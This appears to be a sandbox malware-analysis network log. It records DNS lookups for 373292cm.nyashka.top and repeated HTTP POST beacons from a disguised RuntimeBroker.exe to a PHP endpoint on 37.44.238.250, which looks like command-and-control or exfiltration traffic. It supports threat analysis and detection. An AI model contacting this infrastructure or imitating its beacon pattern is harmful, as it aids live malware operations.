                                                                                  Jan 11, 2025 06:44:49.082895994 CET5715180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:49.083321095 CET5715180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:49.088087082 CET805715137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:49.442249060 CET5715180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:49.447283030 CET805715137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:49.447304964 CET805715137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:49.447331905 CET805715137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:49.712140083 CET805715137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:49.754605055 CET5715180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:49.842535973 CET805715137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:49.895211935 CET5715180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:49.977420092 CET5715180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:49.978584051 CET5715280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:49.982553959 CET805715137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:49.982652903 CET5715180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:49.983383894 CET805715237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:49.983457088 CET5715280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:49.983584881 CET5715280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:49.988346100 CET805715237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:50.333131075 CET5715280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:50.338007927 CET805715237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:50.338021994 CET805715237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:50.338032961 CET805715237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:50.630279064 CET805715237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:50.676476002 CET5715280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:50.762231112 CET805715237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:50.817107916 CET5715280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:50.881917000 CET5715380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:50.886846066 CET805715337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:50.886924982 CET5715380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:50.887586117 CET5715380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:50.892394066 CET805715337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:51.239242077 CET5715380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:51.244151115 CET805715337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:51.244170904 CET805715337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:51.244180918 CET805715337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:51.512744904 CET805715337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:51.567670107 CET5715380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:51.646188021 CET805715337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:51.692102909 CET5715380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:51.824816942 CET5715380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:51.830244064 CET5715480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:51.831507921 CET805715337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:51.831583977 CET5715380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:51.836841106 CET805715437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:51.836963892 CET5715480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:51.837084055 CET5715480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:51.843595982 CET805715437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:52.192189932 CET5715480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:52.199126005 CET805715437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:52.199171066 CET805715437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:52.199199915 CET805715437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:52.468055964 CET805715437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:52.520268917 CET5715480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:52.701010942 CET805715437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:52.701045990 CET805715437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:52.701098919 CET5715480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:52.834202051 CET5715480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:52.834933996 CET5715580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:52.839374065 CET805715437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:52.839554071 CET5715480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:52.839932919 CET805715537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:52.839993954 CET5715580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:52.840137005 CET5715580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:52.844981909 CET805715537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:53.070982933 CET5715580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:53.071520090 CET5715680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:53.076493979 CET805715637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:53.076560020 CET5715680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:53.076770067 CET5715680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:53.081566095 CET805715637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:53.119714022 CET805715537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:53.191298008 CET5715780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:53.196357012 CET805715737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:53.196449041 CET5715780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:53.196543932 CET5715780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:53.201338053 CET805715737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:53.310178995 CET805715537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:53.310249090 CET5715580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:53.426698923 CET5715680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:53.431830883 CET805715637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:53.431864023 CET805715637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:53.552054882 CET5715780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:53.557271957 CET805715737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:53.557317019 CET805715737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:53.557353020 CET805715737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:53.714298010 CET805715637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:53.757642984 CET5715680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:53.835568905 CET805715737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:53.848280907 CET805715637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:53.881728888 CET5715780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:53.895241976 CET5715680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:53.964438915 CET805715737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:54.004966974 CET5715780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:54.080357075 CET5715280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:54.080434084 CET5715680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:54.080641031 CET5715780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:54.081747055 CET5715880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:54.086034060 CET805715637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:54.086051941 CET805715737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:54.086111069 CET5715680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:54.086113930 CET5715780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:54.086575985 CET805715837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:54.087214947 CET5715880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:54.087282896 CET5715880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:54.092116117 CET805715837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:54.735246897 CET805715837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:54.785866022 CET5715880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:45:05.548161030 CET5715880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:45:05.553208113 CET805715837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:45:05.553221941 CET805715837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:45:05.553232908 CET805715837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:45:05.812400103 CET805715837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:45:05.812675953 CET5715880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:45:05.817806005 CET805715837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:45:05.817878962 CET5715880192.168.2.637.44.238.250
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 11, 2025 06:43:06.120949984 CET | 53 | 53371 | 1.1.1.1 | 192.168.2.6
Jan 11, 2025 06:43:14.664320946 CET | 52425 | 53 | 192.168.2.6 | 1.1.1.1
Jan 11, 2025 06:43:14.671338081 CET | 53 | 52425 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 11, 2025 06:43:14.664320946 CET | 192.168.2.6 | 1.1.1.1 | 0xb54f | Standard query (0) | 373292cm.nyashka.top | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:43:14.676865101 CET | 192.168.2.6 | 1.1.1.1 | 0x1 | Standard query (0) | 373292cm.nyashka.top | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 11, 2025 06:43:15.187534094 CET | 1.1.1.1 | 192.168.2.6 | 0x1 | No error (0) | 373292cm.nyashka.top | | 37.44.238.250 | A (IP address) | IN (0x0001) | false
• 373292cm.nyashka.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 56905 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:43:15.226346016 CET | 280 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 373292cm.nyashka.top
Content-Length: 344
Expect: 100-continue
Connection: Keep-Alive
Jan 11, 2025 06:43:15.863224983 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 06:43:15.942276001 CET | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 11 Jan 2025 05:43:15 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1320
Connection: keep-alive
Jan 11, 2025 06:43:15.979217052 CET | 256 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 373292cm.nyashka.top
Content-Length: 384
Expect: 100-continue
Jan 11, 2025 06:43:16.179730892 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 06:43:16.440637112 CET | 308 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 11 Jan 2025 05:43:16 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
Jan 11, 2025 06:43:16.524147034 CET | 257 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 373292cm.nyashka.top
Content-Length: 1872
Expect: 100-continue
Jan 11, 2025 06:43:16.713952065 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 06:43:17.269032001 CET    308    IN    HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:17 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive


Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
1    192.168.2.6    56915    37.44.238.250    80    6008    C:\Windows\LiveKernelReports\RuntimeBroker.exe
Timestamp    Bytes transferred    Direction    Data
Jan 11, 2025 06:43:16.191663027 CET    257    OUT    POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
Jan 11, 2025 06:43:16.537700891 CET    2544    OUT
Jan 11, 2025 06:43:16.822776079 CET    25    IN    HTTP/1.1 100 Continue
Jan 11, 2025 06:43:16.951612949 CET    158    IN    HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:16 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
2    192.168.2.6    56921    37.44.238.250    80    6008    C:\Windows\LiveKernelReports\RuntimeBroker.exe
Timestamp    Bytes transferred    Direction    Data
Jan 11, 2025 06:43:17.738461971 CET    257    OUT    POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
Jan 11, 2025 06:43:18.082683086 CET    2544    OUT
Jan 11, 2025 06:43:18.371696949 CET    25    IN    HTTP/1.1 100 Continue
Jan 11, 2025 06:43:18.502990007 CET    158    IN    HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:18 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
3    192.168.2.6    56926    37.44.238.250    80    6008    C:\Windows\LiveKernelReports\RuntimeBroker.exe
Timestamp    Bytes transferred    Direction    Data
Jan 11, 2025 06:43:18.776649952 CET    281    OUT    POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
Jan 11, 2025 06:43:19.218698978 CET    2544    OUT
Jan 11, 2025 06:43:19.413922071 CET    25    IN    HTTP/1.1 100 Continue
Jan 11, 2025 06:43:19.584779024 CET    158    IN    HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:19 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
4    192.168.2.6    56934    37.44.238.250    80    6008    C:\Windows\LiveKernelReports\RuntimeBroker.exe
Timestamp    Bytes transferred    Direction    Data
Jan 11, 2025 06:43:19.892827988 CET    281    OUT    POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
Jan 11, 2025 06:43:20.242187977 CET    2544    OUT
Jan 11, 2025 06:43:20.520787001 CET    25    IN    HTTP/1.1 100 Continue
Jan 11, 2025 06:43:20.650435925 CET    158    IN    HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:20 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
5    192.168.2.6    56941    37.44.238.250    80    6008    C:\Windows\LiveKernelReports\RuntimeBroker.exe
Timestamp    Bytes transferred    Direction    Data
Jan 11, 2025 06:43:21.204328060 CET    281    OUT    POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
Jan 11, 2025 06:43:21.551412106 CET    2544    OUT
Jan 11, 2025 06:43:21.848150015 CET    25    IN    HTTP/1.1 100 Continue
Jan 11, 2025 06:43:22.021879911 CET    158    IN    HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:21 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
6    192.168.2.6    56947    37.44.238.250    80    6008    C:\Windows\LiveKernelReports\RuntimeBroker.exe
Timestamp    Bytes transferred    Direction    Data
Jan 11, 2025 06:43:22.215986967 CET    281    OUT    POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
Jan 11, 2025 06:43:22.567076921 CET    2544    OUT
Jan 11, 2025 06:43:22.848571062 CET    25    IN    HTTP/1.1 100 Continue
Jan 11, 2025 06:43:22.983200073 CET    158    IN    HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:22 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
7    192.168.2.6    56948    37.44.238.250    80    6008    C:\Windows\LiveKernelReports\RuntimeBroker.exe
Timestamp    Bytes transferred    Direction    Data
Jan 11, 2025 06:43:22.354626894 CET    281    OUT    POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 1852
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
Jan 11, 2025 06:43:22.707684040 CET    1852    OUT
Jan 11, 2025 06:43:23.007421017 CET    25    IN    HTTP/1.1 100 Continue
Jan 11, 2025 06:43:23.139133930 CET    308    IN    HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:22 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive


Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
8    192.168.2.6    56954    37.44.238.250    80    6008    C:\Windows\LiveKernelReports\RuntimeBroker.exe
Timestamp    Bytes transferred    Direction    Data
Jan 11, 2025 06:43:24.129266977 CET    281    OUT    POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
Jan 11, 2025 06:43:24.473403931 CET    2544    OUT
Jan 11, 2025 06:43:24.797979116 CET    25    IN    HTTP/1.1 100 Continue
Jan 11, 2025 06:43:24.930340052 CET    158    IN    HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:24 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
9    192.168.2.6    56961    37.44.238.250    80    6008    C:\Windows\LiveKernelReports\RuntimeBroker.exe
Timestamp    Bytes transferred    Direction    Data
Jan 11, 2025 06:43:25.440104008 CET    257    OUT    POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
Jan 11, 2025 06:43:25.785851955 CET    2536    OUT
Jan 11, 2025 06:43:26.066072941 CET    25    IN    HTTP/1.1 100 Continue
Jan 11, 2025 06:43:26.193763971 CET    158    IN    HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:26 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
10    192.168.2.6    56973    37.44.238.250    80    6008    C:\Windows\LiveKernelReports\RuntimeBroker.exe
Timestamp    Bytes transferred    Direction    Data
Jan 11, 2025 06:43:28.169143915 CET    281    OUT    POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 1872
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
Jan 11, 2025 06:43:28.525475979 CET    1872    OUT
Jan 11, 2025 06:43:28.891774893 CET    25    IN    HTTP/1.1 100 Continue
Jan 11, 2025 06:43:29.039328098 CET    308    IN    HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:28 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  11 | 192.168.2.6 | 56975 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:43:28.911962032 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:29.270168066 CET | 2544 | OUT | Data: request body
                                                                                  Jan 11, 2025 06:43:29.602412939 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:29.732094049 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:29 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  12 | 192.168.2.6 | 56982 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:43:30.147370100 CET | 257 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Jan 11, 2025 06:43:30.645123959 CET | 2544 | OUT | Data: request body
                                                                                  Jan 11, 2025 06:43:30.775299072 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:30.903352022 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:30 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  13 | 192.168.2.6 | 56988 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:43:31.195831060 CET | 257 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Jan 11, 2025 06:43:31.565469027 CET | 2544 | OUT | Data: request body
                                                                                  Jan 11, 2025 06:43:31.843065023 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:31.974092007 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:31 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  14 | 192.168.2.6 | 56990 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:43:32.230444908 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:32.582953930 CET | 2544 | OUT | Data: request body
